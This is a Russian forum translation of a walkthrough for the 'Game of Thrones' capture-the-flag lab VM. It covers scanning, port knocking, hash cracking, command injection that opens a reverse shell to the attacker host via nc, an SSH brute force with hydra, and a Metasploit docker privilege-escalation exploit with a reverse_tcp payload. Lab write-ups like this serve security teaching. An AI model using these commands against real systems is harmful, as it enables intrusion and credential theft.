Статья CTF “Game of Thrones” [Перевод]

Доброго времени суток, codeby.
Первоисточник:

Ссылка скрыта от гостей

Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:

• Статья является переводом.

Приветствую друзья: сегодня мы поиграем в CTF “Game of Thrones”
Образ VM и подробное описание можно найти

Ссылка скрыта от гостей

Автор VM: OscarAkaElvis

Приступим.
Для начала, узнаем IP виртуальной машины (В статье она находится по адресу 192.168.1.133)

netdiscover

Далее используем nmap чтобы найти открытые порты и сервисы расположенные на них

nmap -p- -sV 192.168.1.133

Мы видим, что на 80-ом порту находится веб-сервер, поэтому мы открываем ip в нашем браузере.

Посмотрев на исходный код страницы, мы увидим синтаксис флага.

Далее, найдём директории и другие web-объекты используем dirb

dirb http://192.168.1.133

Dirb нашёл файл robots.txt, открыв его, мы увидим несколько директорий

Откроем директорию /secret-island/ используя user-agent: Three-eyed-raven
прим. переводчика: автор оригинала использует Burp для изменения http-запроса.

По данному url мы найдем ссылку на карту

Открыв карту, мы узнаем местоположение всех флагов

Аналогичным способом обратимся к директории

/direct-access-to-kings-landing/

Посмотрев исходный код, мы увидим что-то похожее на набор портов для port knocking и имя пользователя - oberynmartell.
прим. переводчика: на самом деле там 3 порта (один обрезан на исходном скрине) 3487 64535 12345

Далее мы находим /h/i/d/d/e/n/ директорию (с помощью dirb), открыв её видим следующее.

Взглянув на исходный код страницы найдём пароль для пользователя oberynmartell.

Испытаем найденные креды на ftp сервере. И мы видим первый флаг в шапке ftp-сервера.

С ftp-сервера мы скачали два файла. Один из них содержит хеш и тип хеша. Сохраним хеш в отдельный файл.

Воспользуемся john the ripper для расшифровки хеша.

john --format=dynamic_2008 hash.txt

Теперь используем mcrypt для расшифровки второго файла.

mcrypt -d the_wall.txt.nc

Добавим домен

winterfell.7kingdoms.ctf

в /etc/hosts и откроем ссылку, найденную в файле.

Введем найденные креды, и увидим страницу с двумя изображениями.

Посмотрев исходный код, найдём второй флаг.

Вместе с флагом, мы нашли намек на то что файл

stark_shield.jpg

что то содержит. Так что мы скачиваем файл и прогоняем его через

strings

Таким образом мы находим ещё одну подсказку.

strings stark_shield.jpg

Подсказка даёт нам намёк на то что запись TXT будет содержать что-то полезное, поэтому мы видоизменяем домен и проверяем его с помощью nslookup (для проверки записей TXT)

nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Вот мы и нашли третий флаг, а вместе с ним нашли еще один домен. Добавим его в /etc/hosts и откроем в браузере.

Воспользуемся кредами из TXT записи.

Проверим форму поиска на уязвимости

Далее воспользуемся модулем файлового менеджера, он предоставит нам доступ к некоторым файлам

В директории /home/aryastark мы находим файл под названием ‘flag.txt’

Скачав его, мы получим 4ый флаг.

Теперь у нас есть подсказка для доступа к базе данных, мы уже знаем что это postgresql. Поэтому подключимся, используя креды из файла.

 psql –h 192.168.1.133 –u robinarryn –d mountainandthevale

Мы видим view, которая называется flag, посмотрев её содержимое мы видим строку в base64

Расшифровав строку, мы получаем 5ый флаг.

Далее проверим остальные таблицы, что бы убедиться, что мы ничего не упустили. В одной из таблиц мы находим список имен.

select * from arya_kill_list

Выглядит полезным. При дальнейшем поиске по базе данных мы находим строку в rot16.

Преобразовав её мы узнаем имя базы данных и пароль. Так же текст, намекает нам, что логин должен быть в “нашем” списке для убийства (aria_kill_list).

Испытав список целей Арии в качестве логина, мы находим нужный - TheRedWomanMelisandre.

Проверив единственную таблицу - найдём секретный флаг.

Мы уже знаем, что флаг “The Reach” находится на imap (см.карту). Используем номера портов, что мы нашли ранее для port knocking.
прим. переводчика: про порт кнокинг можно почитать тут

knock 192.168.1.133 3487 64535 12345

Проверим не появились ли новые сервисы и открытые порты. Воспользуемся nmap.

nmap -p- 192.168.1.133

Теперь нам доступен порт 143, на котором запущен imap. Воспользуемся nc и кредами, найденными в подсказке ранее.

nc 192.168.1.133 143

Мы находим 6ой флаг в папке “Входящие”. Также мы получаем следующую подсказку в виде порта 1337 и кредов.

Открываем 192.168.1.133:1337 в браузере и понимаем, что мы на git-сайте.

Просмотрев файлы, мы понимаем что сайт уязвим к инъекции команд, так же мы находим намёк на mysql.

Мы инжектим reverse shell в параметр code.

nc 192.168.1.116 1234

Запустив неткат в режиме прослушки (на основной машине) мы сразу же получим шелл.

nc -lvp 1234

Ранее на веб-страницы мы нашли строку закодированную в hex. Раскодировав её мы получим путь к файлу

file:/home/tyrionlannister/checkpoint.txt

Открыв данный файл - мы получим креды и имя базы данных, которую мы должны искать.

 

[mrOkey]

Воспользуемся информацией и взглянем на доступные таблицы.

Заглянем внутрь таблицы

Мы видим строку закодированную азбукой Морзе. Расшифруем её: /etc/mysql/flag. Попытка получить доступ к файлу укажет нам на его отсутствие. Вспомнив подсказку выше, мы поймём что у нас недостаточно прав. Давайте взглянем на наши права

Таким образом мы узнаём, что можем импортировать файлы в базу данных. Создаём таблицу Flag

Импортируем наш файл в созданную таблицу

Теперь, взглянув на содержимое таблицы, мы увидим 7ой флаг. А также креды для ssh доступа.

Воспользуемся ими

ssh daenerystargaryen@192.168.1.133

Покопавшись в системе мы найдём два файла

digger.txt, checkpoint.txt

Последний содержит подсказку: мы должны подключится по ssh к ip:172.25.0.2 и использовать файл digger.txt для брутфорса пароля.

Скачаем digger.txt на свою систему

scp digger.txt root@192.168.1.116

Создадим тунель, назначим ему порт 2222

ssh daenerystargaryen@192.168.1.133 –L 2222:172.25.0.2:22 –N

Теперь воспользуемся hydra для перебора пароля к 172.25.0.2. В качестве username мы укажем root, и используем digger.txt в качестве словаря:

Так мы узнаем пароль:

Dr4g0nGl4ss

Воспользуемся нашим тунелем для подключения:

Просмотрев файлы мы найдём наш секретный флаг, а так же креды для ssh доступа.

Воспользуемся metasploit для подключения через ssh, используя найденные креды.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set  password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run

После поиска очевидных возможностей для повышение привилегий, таких как исполняемых файлов с установленным битом setuid и эксплойтов для ядра, мы заметили, что сервер лежит в докер контейнере. Поэтому мы воспользуемся эксплойтом повышения привилегий из metasploit.

msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) >  run

Прообгредив нашу сессию, убедимся что мы root.

Покопавшись, мы найдем запароленный zip архив: final_battle и checkpoint.txt, в котором находится псевдокод. Псевдокод расскажет нам как получить пароль используя секретные флаги что мы нашли.

На данный момент у нас есть 2 секретных флага. Вновь пройдясь по файловой системе, мы найдем два mp3 файла. Воспользовавшись exiftool мы найдём ещё один флаг в одном из них.

exiftool  game_of_thrones.mp3

Теперь перепишим псевдокод на python

Запустим созданный скрипт и найдём пароль

Теперь распакуем архив

7z e final_battle

Мы видим файл flag.txt, просмотрев его мы найдем наш последний флаг.

Автор оригинала: Sayantan Bera - технический писатель хакерских статьей и энтузиаст кибербезопасности.

Ссылка скрыта от гостей